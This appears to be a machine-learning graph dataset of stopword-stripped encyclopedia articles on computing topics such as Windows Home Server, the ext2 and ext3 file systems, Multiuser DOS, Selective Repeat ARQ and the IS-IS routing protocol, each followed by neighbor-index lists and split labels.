stores release version offers access web interface via free windows live-provided url uses dynamic dns web interface also allows uploading downloading files content stores however limit 2 gb single batch upload system also supports terminal services gateway allowing remote control desktop windows computer home network currently supported systems would normally support remote desktop windows xp professional tablet media center editions windows vista business enterprise ultimate editions windows 7 professional enterprise ultimate editions web interface also supports embedding remote desktop activex control provide remote access home computers within web interface directly remote sessions also connect home server console configure server internet windows home server allows developers publish community commercial add-ins designed enhance windows home server added functionality january 2010 nearly 100 add-ins developed whs including applications antivirus security backups disk management automation media network/power management remote access bittorrent windows home server sdk software development kit provides developers set apis tools use developing extending windows home server windows home server features integration windows xp sp2 newer windows vista windows 7 release power pack 3 software installation either client cd via network share connector software may also installed accessing codice_1 link provided download connector software install troubleshooting tools files stored windows home server also available windows share opening compatibility wide variety operating systems also administration console available via remote desktop allowing administration unsupported platforms windows home server support microsoft security essentials 64-bit windows client support introduced power pack 1 though restore wizard windows home server restore cd unable restore clients running 64-bit operating systems due fact restore cd support 64-bit drivers windows xp professional x64 n't officially supported however unofficial workarounds allow connector software work xp x64 integration file sharing service location mac os x time machine apparently considered upon mac os x leopard release apple removed ability use smb file sharing protocol time machine backups one whs provider hp provides plug-in home server line capable time machine backup home server windows home server officially supported domain controller capability readily join windows server domain wireless networking supported dedicated devices operating system pre-installed may supplied server recovery disk reloads os network connection utilized hp mediasmart server fujitsu siemens scaleo home server first release windows home server rtm release manufacturing suffered file corruption flaw whereby files saved directly edited shares whs device could become corrupted files ntfs alternate data streams susceptible flaw flaw led data corruption server heavy load time file ads saved onto share backups client pcs made windows home server susceptible flaw even though issue first acknowledged october 2007 microsoft formally warned users seriousness flaw 20 december 2007 microsoft issued list applications including windows live photo gallery microsoft onenote microsoft outlook synctoy 2.0 might triggered flaw used edit files whs share directly issue fixed power pack 1 released 21 july 2008 windows home server rtm include mechanism backing server power pack 1 added ability back files stored shared folders external drive users also subscribe 3rd-party online services fee however remains way back installed server operating system backing-up client backup database available either manually using instructions provided microsoft page 24 document done using whs bdbb add-in written alex kuretz available website hardware manufacturers developed dedicated boxes microsoft also released windows home server oem/system builder license november 2008 microsoft lowered price whs system builder sku us 100 users also choose use existing pc build systems would include use whs system builder 23 march 2009 microsoft also made windows home server available msdn microsoft technet subscribers computer systems available bundled windows home server license case versions windows possible request refund license fees paid windows home server
[ 8576, 641, 2179, 3463, 5384, 1417, 651, 6797, 8080, 2193, 3857, 6675, 7057, 8976, 10896, 11283, 4505, 5145, 9757, 4126, 10270, 7970, 4515, 11301, 3366, 8998, 3496, 6441, 6697, 10026, 1581, 7983, 3250, 3890, 9910, 10747, 6462, 7615, 321, 7...
Test
2,197
6
Ext2:ext2 ext2 second extended file system file system linux kernel initially designed rémy card replacement extended file system ext designed according principles berkeley fast file system bsd first commercial-grade filesystem linux canonical implementation ext2 ext2fs filesystem driver linux kernel implementations varying quality completeness exist gnu hurd minix 3 bsd kernels mint third-party microsoft windows macos drivers ext2 default filesystem several linux distributions including debian red hat linux supplanted recently ext3 almost completely compatible ext2 journaling file system ext2 still filesystem choice flash-based storage media sd cards usb flash drives lack journal increases performance minimizes number writes flash devices limited number write cycles however recent linux kernels support journal-less mode ext4 provides benefits found ext2 early development linux kernel made cross-development minix operating system minix file system used linux first file system minix file system mostly free bugs used 16-bit offsets internally thus maximum size limit 64 megabytes also filename length limit 14 characters limitations work began replacement native file system linux ease addition new file systems provide generic file api vfs virtual file system layer added linux kernel extended file system ext released april 1992 first file system using vfs api included linux version 0.96c ext file system solved two major problems minix file system maximum partition size filename length limitation 14 characters allowed 2 gigabytes data filenames 255 characters still problems support separate timestamps file access inode modification data modification solution problems two new filesystems developed january 1993 linux kernel 0.99 xiafs second extended file system ext2 overhaul extended file system incorporating many ideas berkeley fast file system ext2 also designed extensibility mind space left many on-disk data structures use future versions since ext2 testbed many new extensions vfs api features withdrawn posix draft acl proposal withdrawn extended attribute proposal generally implemented first ext2 relatively simple extend internals well understood linux kernels prior 2.6.17 restrictions block driver mean ext2 filesystems maximum file size 2 tib ext2 still recommended journaling file systems bootable usb flash drives solid-state drives ext2 performs fewer writes ext3 journaling major aging factor flash chip number erase cycles erase cycles happen frequently writes decreasing writes increases life span solid-state device another good practice filesystems flash devices use noatime mount option reason space ext2 split blocks blocks grouped block groups analogous cylinder groups unix file system typically thousands blocks large file system data given file typically contained within single block group possible done minimize number disk seeks reading large amounts contiguous data block group contains copy superblock block group descriptor table block groups contain block bitmap inode bitmap inode table finally actual data blocks superblock contains important information crucial booting operating system thus backup copies made multiple block groups file system however typically first copy found first block file system used booting group descriptor stores location block bitmap inode bitmap start inode table every block group turn stored group descriptor table every file directory represented inode term inode comes index node time became i-node inode inode includes data size permission ownership location disk file directory example ext2 inode structure quote linux kernel documentation ext2 pointers first 12 blocks contain file data inode pointer indirect block contains pointers next set blocks pointer doubly indirect block pointer trebly indirect block thus structure ext2 15 pointers pointers 1 12 point direct blocks pointer 13 points indirect block pointer 14 points doubly indirect block pointer 15 points triply indirect block directory list directory entries directory entry associates one file name one inode number consists inode number length file name actual text file name find file directory searched front-to-back associated filename reasonable directory sizes fine large directories inefficient ext3 offers second way storing directories htree efficient list filenames root directory always stored inode number two file system code find mount time subdirectories implemented storing name subdirectory name field inode number subdirectory inode field hard links implemented storing inode number one file name accessing file either name results inode number therefore data special directories current directory .. parent directory implemented storing names .. directory inode number current parent directories inode field special treatment two entries receive automatically created new directory made deleted new file directory created ext2 must decide store data disk mostly empty data stored almost anywhere however clustering data related data minimize seek times maximize performance ext2 attempts allocate new directory group containing parent directory theory accesses parent children directories likely closely related ext2 also attempts place files group directory entries directory accesses often lead file accesses however group full new file new directory placed non-full group data blocks needed store directories files found looking data allocation bitmap needed space inode table found looking inode allocation bitmap reason limits ext2 file format data operating system kernel mostly factors determined file system built depend block size ratio number blocks inodes linux block size limited architecture page size also userspace programs handle files larger 2 gib b block size maximum file size limited min b /4 b /4 b /4+12 b 2-1 *512 due i_block structure array direct/indirect ext2_n_blocks i_blocks 32-bit integer value representing number 512-byte blocks file max number sublevel-directories 31998 due link count limit directory indexing available ext2 performance issues directories large number files 10,000+ theoretical limit number files directory 1.3 × 10 although relevant practical situations note linux 2.4 earlier block devices limited 2 tib limiting maximum size partition regardless block size e2compr modification ext2 driver linux kernel support compression decompression files file system without support user applications e2compr small patch ext2 e2compr compresses regular files administrative data superblock inodes directory files etc compressed mainly safety reasons access compressed blocks provided read write operations compression algorithm cluster size specified per-file basis directories also marked compression case every newly created file directory automatically compressed cluster size algorithm specified directory e2compr new file system patch ext2 made support ext2_compr_fl flag require user make new partition continue read write existing ext2 file systems one consider simply way read write routines access files could created simple utility similar gzip compress compressed uncompressed files coexist nicely ext2 partitions latest e2compr-branch available current releases linux 2.4 2.6 3.0 latest patch linux 3.0 released august 2011 provides multicore high memory support also branches linux 2.0 2.2 access ext2 partitions microsoft windows possible installable file system ext2ifs ext2fsd filesystem userspace used macos
[ 5120, 2564, 6669, 3598, 10257, 9236, 6677, 5142, 8214, 3611, 5661, 9249, 9762, 2597, 5158, 5167, 7225, 2107, 11323, 8254, 8772, 3662, 1109, 10851, 4708, 8298, 9836, 7789, 5743, 6768, 6771, 9333, 6263, 9335, 9848, 3708, 2687, 8832, 9343, 5...
None
2,198
6
Cp_(Unix):cp unix computing codice_1 command various unix unix-like operating systems copying files directories command three principal modes operation expressed types arguments presented program copying file another file one files directory copying entire directories another directory utility accepts various command line option flags detail operations performed two major specifications posix cp gnu cp gnu cp many additional options posix version command also available efi shell cp part version 1 unix version codice_1 bundled gnu coreutils written torbjorn granlund david mackenzie jim meyering cp three principal modes operation modes inferred type count arguments presented program upon invocation copying file another file copying file directory copying directory directory -r -r must used creating copy file current directory copies prog.c prog.bak prog.bak file already exist cp command creates exist cp command replaces contents contents prog.c file copy two files current directory another directory copies files jones /home/nick/clients/jones smith /home/nick/clients/smith copy file new file preserve modification date time access control list associated source file copies smith file smith.jr file instead creating file current date time stamp system gives smith.jr file date time smith file smith.jr file also inherits smith file access control protection copy directory including files subdirectories another directory copies directory clients including files subdirectories files subdirectories directory customers/clients unix systems behave differently mode depending termination directory paths using codice_3 gnu system behaves expected however bsd system copies contents clients directory instead directory clients happens gnu bsd systems path source directory ends .. without trailing slash copying file existing file performed opening existing file update mode thereby preserving files inode requires write access results target file retaining permissions originally
[ 2432, 515, 516, 1412, 9733, 9735, 3976, 521, 5256, 6281, 6664, 4750, 11663, 4369, 10387, 5397, 6812, 7196, 10564, 4001, 6138, 2599, 7847, 8236, 4398, 7983, 1336, 8504, 6459, 7356, 3522, 451, 1987, 965, 2245, 8517, 8772, 9542, 5706, 3659, ...
Validation
2,199
6
Ext3:ext3 ext3 third extended filesystem journaled file system commonly used linux kernel used default file system many popular linux distributions stephen tweedie first revealed working extending ext2 journaling linux ext2fs filesystem 1998 paper later february 1999 kernel mailing list posting filesystem merged mainline linux kernel november 2001 2.4.15 onward main advantage ext2 journaling improves reliability eliminates need check file system unclean shutdown successor ext4 performance speed ext3 less attractive competing linux filesystems ext4 jfs reiserfs xfs ext3 significant advantage allows in-place upgrades ext2 without backup restore data benchmarks suggest ext3 also uses less cpu power reiserfs xfs also considered safer linux file systems due relative simplicity wider testing base ext3 adds following features ext2 without features ext3 file system also valid ext2 file system situation allowed well-tested mature file system maintenance utilities maintaining repairing ext2 file systems also used ext3 without major changes ext2 ext3 file systems share standard set utilities e2fsprogs includes fsck tool close relationship also makes conversion two file systems forward ext3 backward ext2 straightforward ext3 lacks modern filesystem features dynamic inode allocation extents situation might sometimes disadvantage recoverability significant advantage file system metadata fixed well-known locations data structures redundancy significant data corruption ext2 ext3 may recoverable tree-based file system may maximum number blocks ext3 2 size block vary affecting maximum number files maximum size file system three levels journaling available linux implementation ext3 three modes internal structure file system assured consistent even crash case data content files directories modified system crashed affected rest intact recovery ext3 aims backward-compatible earlier ext2 many on-disk structures similar ext2 consequently ext3 lacks recent features extents dynamic allocation inodes block sub-allocation directory 31998 subdirectories inode 32,000 links direct subdirectory increases parent folder inode link counter .. reference ext3 like current linux filesystems fsck-ed filesystem mounted writing attempting check filesystem already mounted read/write mode likely detect inconsistencies filesystem metadata filesystem metadata changing fsck applies changes attempt bring inconsistent metadata consistent state attempt fix inconsistencies corrupt filesystem online ext3 defragmentation tool works filesystem level offline ext2 defragmenter codice_1 requires ext3 filesystem converted back ext2 first however codice_1 may destroy data depending feature bits turned filesystem know handle many newer ext3 features userspace defragmentation tools like shake defrag shake works allocating space whole file one operation generally cause allocator find contiguous disk space files used time shake try write next one another defrag works copying file however strategy works file system enough free space true defragmentation tool exist ext3 however linux system administrator guide states modern linux filesystem keep fragmentation minimum keeping blocks file close together even ca n't stored consecutive sectors filesystems like ext3 effectively allocate free block nearest blocks file therefore necessary worry fragmentation linux system ext3 resistant file fragmentation ext3 get fragmented time specific usage patterns like slowly writing large files consequently ext4 successor ext3 online filesystem defragmentation utility e4defrag currently supports extents contiguous file regions ext3 support recovery deleted files ext3 driver actively deletes files wiping file inodes crash safety reasons still several techniques free proprietary software recovery deleted lost files using file system journal analysis however guarantee specific file recovery e3compr unofficial patch ext3 transparent compression direct port e2compr still needs development compiles boots well upstream kernels journaling implemented yet unlike number modern file systems ext3 native support snapshots ability quickly capture state filesystem arbitrary times instead relies less-space-efficient volume-level snapshots provided linux lvm next3 file system modified version ext3 offers snapshots support yet retains compatibility ext3 on-disk format ext3 checksumming writing journal storage device extra cache barrier=1 enabled mount option /etc/fstab hardware out-of-order write caching one runs risk severe filesystem corruption crash storage devices write caches report system data completely written even written volatile cache hard disk writes done out-of-order due modern hard disks caching writes order amortize write speeds likely one write commit block transaction relevant blocks written power failure unrecoverable crash occur blocks get written system rebooted upon reboot file system replay log normal replay winners transactions commit block including invalid transaction happened tagged valid commit block unfinished disk write thus proceed using corrupt journal data file system thus mistakenly overwrite normal data corrupt data replaying journal checksums used blocks fake winner transaction tagged mutual checksum file system could known better replayed corrupt data onto disk journal checksumming added ext4 filesystems going device mapper interface including software raid lvm implementations may support barriers issue warning mount option used also disks properly implement write cache flushing extension necessary barriers work causes similar warning situations barriers supported practical reliable write ordering possible turning disk write cache using mount option turning disk write cache may required even barriers available applications like databases expect call fsync flush pending writes disk barrier implementation n't always clear drive write cache response call also potential issue barrier implementation related error handling events drive failure also known sometimes virtualization technologies properly forward fsync flush commands underlying devices files volumes disk guest operating system similarly hard disks controllers implement cache flushing incorrectly still advertise supported return error used many ways handle fsync write cache handling incorrectly safer assume cache flushing work unless explicitly tested regardless reliable individual components believed ext3 stores dates unix time using four bytes file header 32 bits give enough scope continue processing files beyond january 18 2038 year 2038 problem geek millennium expected cause widespread disruption dealt timely fashion june 28 2006 theodore ts principal developer ext3 announced enhanced version called ext4 october 11 2008 patches mark ext4 stable code merged linux 2.6.28 source code repositories marking end development phase recommending adoption 2008 ts stated although ext4 improved features much faster ext3 major advance uses old technology stop-gap ts believes btrfs better direction offers improvements scalability reliability ease management btrfs also number design ideas reiser3/4
[ 5120, 2051, 2564, 6669, 3598, 10257, 9236, 6677, 5142, 8214, 3611, 9249, 9762, 2597, 5158, 7225, 2107, 11323, 8254, 8260, 8772, 3142, 3656, 7244, 3662, 1109, 5206, 10851, 4708, 8298, 9836, 7789, 6768, 9333, 6263, 9335, 3708, 9343, 5256, 7...
None
2,200
7
EVS_Broadcast_Equipment:evs broadcast equipment evs broadcast equipment sa belgian company manufactures live outside broadcast digital video production systems xt3 production video servers enable creation editing exchange playout audio video feeds programming television networks consists primarily broadcasting prerecorded images recently stored tapes linear editing editing tape replaced digital media non-linear editing today digital technology hard disk non-linear definition common alternative clear confirmation migration towards technology years even though still take another 5 6 years hard disk penetration rate increase 30 70 television stations began migrating tapeless interoperable computer platforms beginning late 1990s video recorders rarely used nowadays live productions evs type digital media servers norm live broadcasting evs co-founded 1994 laurent minguet three years later company invested 30 capital private funds roundabout eur 4 million 1998 evs listed first time stock exchange initial eur 14.8 quotation per share comparable levels valued eur 204 million year evs acquired vse hardware subcontractor managed michel counson transaction vse received evs shares approximate eur 4.5 million value since evs become major broadcast actor focusing digital recording technologies live sport tv production evs core products primarily used outbroadcasting vans ob vans allow high-quality respectively slow-motion image replay evs revolutionised professional digital recording first introduce hard disk drive field instead traditional magnetic tape recording business led time sony panasonic establishing outbroadcasting sport production evs started using high value servers address tv studio production full range products 2002 strategic move contributed +40 uplift 2012 additionally evs founded xdc 2004 pioneer high definition cinema broadcasting restructured within dcinex group evs sold stake dcinex 2014 2001 laurent minguet stepped position director three years later gave position side decided leave role ceo director following board directors meeting held september 15 2011 transitional period evs managed board directors 2012 evs appoints joop janssen ceo 10 october 2014 board directors joop janssen mutually agreed end term office duties joop janssen muriel de lathouwer member board directors evs chairing strategy committee appointed president executive committee interim basis 5 january 2015 evs announced acquired scalable video system gmbh svs developing it-based vision mixers dyvi live sa company based brussels distributing products svs name dyvi 19 february 2015 evs broadcast equipment appoints muriel de lathouwer managing director ceo july 17 2018 board directors muriel de lathouwer mutually agreed end term office duties muriel de lathouwer evs headquarters administration production development located liège belgium 4 additional development centers found evs also sales support offices london los angeles new york dubai mexico paris munich madrid brescia beijing hong kong sydney mumbai
[ 10948 ]
Validation
2,201
2
Multiuser_DOS:multiuser dos multiuser dos real-time multi-user multi-tasking operating system ibm pc-compatible microcomputers evolution older concurrent cp/m-86 concurrent dos concurrent dos 386 operating systems originally developed digital research acquired developed novell 1991 ancestry lies earlier digital research 8-bit operating systems cp/m mp/m 16-bit single-tasking cp/m-86 evolved cp/m novell abandoned multiuser dos 1992 three master value added resellers vars datapac australasia concurrent controls intelligent micro software allowed take continued independent development datapac multiuser dos system manager cci multiuser dos ims multiuser dos real/32 flexos line evolved concurrent dos 286 concurrent dos 68k sold integrated systems inc. isi july 1994 initial version cp/m-86 1.0 bdos 2.x adapted became available ibm pc 1982 commercially unsuccessful ibm pc dos 1.0 offered much facilities considerably lower price like pc dos cp/m-86 fully exploit power capabilities new 16-bit machine soon supplemented implementation cp/m multitasking 'big brother mp/m-86 2.0 since september 1981 turned pc multiuser machine capable supporting multiple concurrent users using dumb terminals attached serial ports environment presented user made seem entire computer since terminals cost fraction then-substantial price complete pc offered considerable cost savings well facilitating multi-user applications accounts stock control time pc networks rare expensive difficult implement cp/m-86 1.1 bdos 2.2 mp/m-86 2.x merged create concurrent cp/m-86 3.0 also known ccp/m-86 bdos 3.0 1982/1983 one designers frank holsworth initially single-user operating system supporting true multi-tasking four default configuration cp/m-86 compatible programs later versions supported dumb terminals could deployed multiuser systems concurrent cp/m-86 3.1 bdos 3.1 shipped 21 february 1984 february 1984 digital research also offered version concurrent cp/m-86 windowing capabilities named concurrent cp/m windows ibm personal computer personal computer xt adaptation concurrent cp/m-86 lsi-m4 lsi octopus cal pc computers machines 16-bit 8-bit processors early days 16-bit personal computing 8-bit software available often ran faster corresponding 16-bit software concurrent cp/m-86/80 allowed users run cp/m 8-bit cp/m-86 16-bit applications command entered operating system ran corresponding application either 8-bit 16-bit processor depending whether executable file .com .cmd extension emulated cp/m environment 8-bit programs translating cp/m system calls cp/m-86 system calls executed 16-bit processor august 1983 bruce skidmore ray pedrizetti dave brown gordon edmonds teamed create pc-mode optional module concurrent cp/m-86 3.1 bdos 3.1 provide basic compatibility pc dos ms-dos shown publicly comdex december 1983 shipped march 1984 concurrent dos 3.1 a.k.a cdos bdos 3.1 hardware vendors simple dos applications directly access screen hardware could run example although console program pkzip worked perfectly offered facilities cp/m-native arc archiver applications performed screen manipulations wordstar word processor dos would native concurrent cp/m cp/m-86 versions required concurrent dos 3.1 4.1 developed us oem adaptations localizations carried dr europe oem support group newbury uk since 1983 digital research positioned concurrent dos 4.1 gem alternative ibm topview 1985 concurrent dos 3.2 bdos 3.2 1984 compatible pc dos 1.x available many different hardware platforms version ibm pc compatible bios/xios named concurrent pc dos 3.2 efforts part cooperation motorola since 1984 led development concurrent dos 68k austin texas successor cp/m-68k written c. concurrent dos 68k 1.0 became available oem evaluation early 1985 effort received considerable funding worth several million dollars motorola designed 68000/68010 processors like earlier gemdos system 68000 processors initially ran motorola vme/10 development system concurrent dos 68k 1.20/1.21 available april 1986 offered 200.000 dollars oems system evolved flexos 68k late 1986 known versions include parallel concurrent dos 68k effort digital research also previewed concurrent dos 286 cooperation intel january 1985 concurrent dos 286 complete rewrite c language based new system architecture dynamically loadable device drivers instead static bios xios one main architects frank holsworth operating system would function strictly 80286 native mode allowing protected mode multi-user multitasking operation running 8086 emulation worked b-1 step prototype chip samples digital research evaluation copies operating system already shipping april discovered problems emulation production level c-1 step processor may would allow concurrent dos 286 run 8086 software protected mode release concurrent dos 286 scheduled late may delayed intel could develop new version chip august extensive testing e-1 step samples 80286 digital research said intel corrected documented 286 errata still undocumented chip performance problems prerelease version concurrent dos 286 running e-1 step intel said approach digital research wished take emulating 8086 software protected mode differed original specifications nevertheless incorporated e-2 step minor changes microcode allowed digital research run emulation mode much faster see loadall limitations affected flexos 286 version 1.x reengineered derivation concurrent dos 286 developed digital research new flexible automation business unit monterey ca since 1986 later versions added compatibility pc dos 2.x 3.x known versions include oem support group relocated digital research newly created european development centre edc hungerford uk 1986 started take development concurrent dos family since concurrent dos 4.11 including siblings like dos plus successors developed hungerford uk versions 5 6 concurrent dos xm xm standing expanded memory could bank switch 8 mb eems provide real-mode environment run multiple cp/m-86 dos programs concurrently support three users one local two hooked via serial terminals 1987 concurrent dos rewritten become concurrent dos 386 still continuation classical xios bdos architecture ran machines equipped intel 80386 later processors using 386 hardware facilities virtualizing hardware allowing dos applications run unmodified concurrent dos 386 even terminals os supported concurrent multiuser file access allowing multiuser applications run individual pcs attached network server concurrent dos 386 allowed single server support number users dumb terminals inexpensive low-specification pcs running terminal emulation software without need expensive workstations then-expensive network cards true multiuser system several users could use single database record locking prevent mutual interference concurrent dos 6.0 represented also starting point dr dos family carved known versions include concurrent pc dos xm 5.0 emulated ibm pc dos 2.10 whereas concurrent dos xm 6.0 concurrent dos 386 2.0 compatible ibm pc dos 3.30 known cci concurrent dos adaptations concurrent controls inc. include adaptations include later versions concurrent dos 386 incorporated enhanced functionality dr later single-user pc dos clone dr dos 5.0 product given explanatory name multiuser dos a.k.a mdos starting version 5.0 bdos 6.5 1991 multiuser dos suffered several technical limitations restricted ability compete lans based pc dos required special device drivers much common hardware pc dos drivers multiuser multi-tasking aware driver installation complex simple pc dos method copying files onto boot disk modifying config.sys appropriately necessary relink multiuser dos kernel known nucleus using sysgen command multiuser dos also unable use many common pc dos additions network stacks limited ability support later developments pc-compatible world graphics adaptors sound cards cd-rom drives mice although many soon rectified example graphical terminals developed allowing users use cga ega vga software less flexible regard network individual pcs prices fell became less less competitive although still offered benefits terms management lower total cost ownership multi-user operating system price higher single-user system course required special device drivers unlike single-user multitasking dos add-ons quarterdeck desqview unlike mp/m never became popular single-user multitasking use novell acquired digital research 1991 abandoned multiuser dos 1992 three master vars datapac australasia concurrent controls intelligent micro software allowed license source code system take continue independent development derivations 1994 known versions include versions digital research novell dr multiuser dos reported ibm pc dos version 3.31 known versions datapac australasia pty limited include 1997 datapac bought citrix systems inc. system manager abandoned soon 2002 sydney-based unit spun citrix advanced products group known cci multiuser dos versions concurrent controls inc. cci include versions cci multiuser dos report ibm pc dos version 3.31 similar setver dos changed using multiuser dos dosver x.y utility 1999 cci changed name applica inc 2002 applica technology became aplycon technologies inc known adaptations ims multiuser dos include versions ims multiuser dos report ibm pc dos version 3.31 intelligent micro software ltd. ims thatcham uk acquired license develop multiuser dos novell 1994 renamed product real/32 1995 similar flexos/4690 os ibm 1995 licensed real/32 7.50 bundle 4695 pos terminals ims real/32 versions real/32 7.50 7.74 report ibm pc dos version 3.31 whereas 7.80 higher report version 6.20 lba fat32 support added real/32 7.90 1999 2002-04-19 intelligent micro software ltd. filed insolvency taken one major customers barry quittenton itera ltd company dissolved 2006-03-28 2010 real/32 supplied integrated solutions thatcham uk company address later listed builders real/ng ims attempt create next generation real/32 also named real/32 internet age real/ng promised increased range hardware pcs x86 multi-processor server systems advertised feature list 2003 10 december 2003 ims made realng v1.60-v1.19-v1.12 available based internet archive seems latest release 2005 realng.com website mirroring ims main website mention real/ng real/32 various releases operating system increasing ability run dos programs software written platform could take advantage features using function calls specifically suitable multiuser operation used pre-emptive multitasking preventing badly-written applications delaying processes retaining control processor day multiuser dos supported popular ssl/tls libraries wolfssl api provided support blocking non-blocking message queues mutual-exclusion queues ability create sub-process threads executed independently parent method pausing execution waste processor cycles unlike idle loops used single-user operating systems applications started attached console however application need user interaction could detach console run background process later reattaching console needed another key feature memory management supported shared memory model processes addition usual models available normal dos programs shared memory model code data sections program isolated code contained modifiable data code sections memory could shared several processes running program thereby reducing memory requirements programs written adapted multitasking platform need avoid technique used single-tasking systems going endless loops interrupted example waiting user press key wasted processor time could used processes instead concurrent dos provided api call process could call sleep period time later versions concurrent dos kernel included idle detection monitored dos api calls determine whether application useful work fact idle case process suspended allowing processes run idle detection catalyst patented dr-dos dynamic idle detection power management feature invented 1989 roger gross john p. constant marketed batterymax
[ 6148, 7173, 10757, 10253, 6675, 7187, 10776, 25, 4637, 9762, 5158, 6187, 7217, 9784, 10809, 6207, 576, 6730, 10333, 97, 5220, 1126, 8298, 8301, 2672, 9329, 7285, 4727, 2168, 9335, 6778, 1147, 11383, 3197, 1150, 2179, 6276, 10883, 9353, 67...
None
2,202
4
Alastair_MacWillson:alastair macwillson dr. alastair carmichael macwillson british cyber security professional macwillson chair institute information security professionals qufaro founding director cambridge analytica additionally principal chertoff group macwillson spent 16 years british foreign service working technical political risk analysis former ussr middle east united states dr. alastair carmichael macwillson british intelligence security cyber security professional macwillson chair institute information security professionals qufaro founding director cambridge analytica additionally principal chertoff group macwillson referenced spending 16 years british foreign service working technical political risk analysis former ussr middle east united states however cover real job officer mi6 direct recruit sis university oldfield chief initially specialised terrorist threat northern ireland 1980 posted senior intelligence officer oman research department internal security service staffed several senior sis gchq personnel director operations 1989 time worked cia establishing joint us/uk rapid deployment force combat terrorist events late 1989 returned uk 1990 published hmg sanctioned book entitled hostage taking terrorism since 1990 macwillson roving hq brief problem solver alleged set special operations group within sis 10 hostage taking terrorism dr. alastair macwillson published 1991 mcmillan 11 cambride analytica
[ 2202, 691 ]
Validation
2,203
5
Selective_Repeat_ARQ:selective repeat arq selective repeat arq/selective reject arq specific instance automatic repeat-request arq protocol used solve sequence number dilemma communications selective repeat part automatic repeat-request arq selective repeat sender sends number frames specified window size even without need wait individual ack receiver go-back-n arq receiver may selectively reject single frame may retransmitted alone contrasts forms arq must send every frame point receiver accepts out-of-order frames buffers sender individually retransmits frames timed may used protocol delivery acknowledgement message units may used protocol delivery subdivided message sub-units used protocol delivery messages sending process continues send number frames specified window size even frame loss unlike go-back-n arq receiving process continue accept acknowledge frames sent initial error general case sliding window protocol transmit receive window sizes greater 1 receiver process keeps track sequence number earliest frame received sends number every acknowledgement ack sends frame sender reach receiver sender continues send subsequent frames emptied window receiver continues fill receiving window subsequent frames replying time ack containing sequence number earliest missing frame sender sent frames window re-sends frame number given acks continues left size sending receiving windows must equal half maximum sequence number assuming sequence numbers numbered 0 n −1 avoid miscommunication cases packets dropped understand consider case acks destroyed receiving window larger half maximum sequence number possibly even packets present timeouts duplicates recognized sender moves window every packet acknowledged used protocol delivery subdivided messages works somewhat differently non-continuous channels messages may variable length standard arq hybrid arq protocols may treat message single unit alternately selective retransmission may employed conjunction basic arq mechanism message first subdivided sub-blocks typically fixed length process called packet segmentation original variable length message thus represented concatenation variable number sub-blocks standard arq message whole either acknowledged acked negatively acknowledged naked arq selective transmission ack response would additionally carry bit flag indicating identity sub-block successfully received arq selective retransmission sub-divided messages retransmission diminishes length needing contain sub-blocks linked channel models variable length messages probability error-free reception diminishes inverse proportion increasing message length words easier receive short message longer message therefore standard arq techniques involving variable length messages increased difficulty delivering longer messages repeat full length selective re-transmission applied variable length messages completely eliminates difficulty delivering longer messages successfully delivered sub-blocks retained transmission number outstanding sub-blocks following transmissions diminishes selective repeat implemented udp transmission transmission control protocol uses variant go-back-n arq ensure reliable transmission data internet protocol provide guaranteed delivery packets selective acknowledgement sack extension may also use selective repeat arq itu-t g.hn standard provides way create high-speed 1 gigabit/s local area network using existing home wiring power lines phone lines coaxial cables uses selective repeat arq ensure reliable transmission noisy media g.hn employs packet segmentation sub-divide messages smaller units increase probability one received correctly stanag 5066 profile hf radio data communications uses selective repeat arq maximum window size 128 protocol-data units pdus
[ 2752, 5472, 1154, 10924, 5071, 2640, 4691, 2772, 4918 ]
Validation
2,204
9
Name_collision:name collision term name collision refers nomenclature problem occurs computer programs variable name used different things two separate areas joined merged otherwise go occupying separate namespaces sharing one collision identifiers must resolved way new software mashup work right problems name collision methods avoid common issue introductory level analysis computer languages c++ term name collision used computer science three decades referring names various classification systems several techniques avoiding name collisions including use tactics used resolve name collisions
[ 2936, 5059, 1724, 8262 ]
Validation
2,205
4
Charles_Proxy:charles proxy charles web debugging proxy cross-platform http debugging proxy server application written java enables user view http https http/2 enabled tcp port traffic accessed via local computer includes requests responses including http headers metadata e.g cookies caching encoding information functionality targeted assisting developers analyze connections messaging charles autoconfigure use following browsers
[ 64, 9440, 1064, 10924, 461, 5677, 6797, 7983, 4725, 823 ]
Test
2,206
5
IS-IS:is-is intermediate system intermediate system is-is also written isis routing protocol designed move information efficiently within computer network group physically connected computers similar devices accomplishes determining best route data packet-switched network is-is protocol defined iso/iec 10589:2002 international standard within open systems interconnection osi reference design internet engineering task force ietf republished is-is rfc 1142 rfc later marked historic rfc 7142 republished draft rather final version iso standard causing confusion is-is called de facto standard large service provider network backbones is-is interior gateway protocol designed use within administrative domain network contrast exterior gateway protocols primarily border gateway protocol bgp used routing autonomous systems rfc 1930 is-is link-state routing protocol operating reliably flooding link state information throughout network routers is-is router independently builds database network topology aggregating flooded network information like ospf protocol is-is uses dijkstra algorithm computing best path network packets datagrams forwarded based computed ideal path network destination is-is protocol developed digital equipment corporation part decnet phase v. standardized iso 1992 iso 10589 communication network devices termed intermediate systems opposed end systems hosts iso purpose is-is make possible routing datagrams using iso-developed osi protocol stack called clns is-is developed roughly time internet engineering task force ietf developing similar protocol called ospf is-is later extended support routing datagrams internet protocol ip network layer protocol global internet version is-is routing protocol called integrated is-is rfc 1195 is-is open shortest path first ospf link state protocols use dijkstra algorithm computing best path network result conceptually similar support variable length subnet masks use multicast discover neighboring routers using hello packets support authentication routing updates ospf natively built route ip layer 3 protocol runs top ip is-is osi layer 2 protocol layer connectionless network protocol clnp widespread adoption ip may contributed ospf popularity is-is use ip carry routing information messages ospf version 2 hand designed ipv4 is-is neutral regarding type network addresses route allowed is-is easily used support ipv6 operate ipv6 networks ospf protocol rewritten ospf v3 specified rfc 2740 ospf is-is routers build topological representation network map indicates subnets is-is router reach lowest-cost shortest path subnet used forward traffic is-is differs ospf way areas defined routed is-is routers designated level 1 intra-area level 2 inter area level 1–2 routing information exchanged level 1 routers level 1 routers area level 2 routers form relationships exchange information level 2 routers level 1–2 routers exchange information levels used connect inter area routers intra area routers ospf areas delineated interface area border router abr actually two areas effectively creating borders areas inside abr whereas is-is area borders routers designated level 2 level 1–2 result is-is router ever part single area is-is also require area 0 area zero backbone area inter-area traffic must pass logical view ospf creates something spider web star topology many areas attached directly area zero is-is contrast creates logical topology backbone level 2 routers branches level 1–2 level 1 routers forming individual areas is-is also differs ospf methods reliably floods topology topology change information network however basic concepts similar ospf larger set extensions optional features specified protocol standards however is-is easier expand use type-length-value tlv data allows engineers implement support new techniques without redesigning protocol example order support ipv6 is-is protocol extended support additional tlvs whereas ospf required new protocol draft ospfv3 addition is-is less chatty scale support larger networks given set resources is-is support routers area ospf contributed is-is isp-scale protocol tcp/ip implementation known integrated is-is dual is-is described rfc 1195 is-is also used control plane ieee 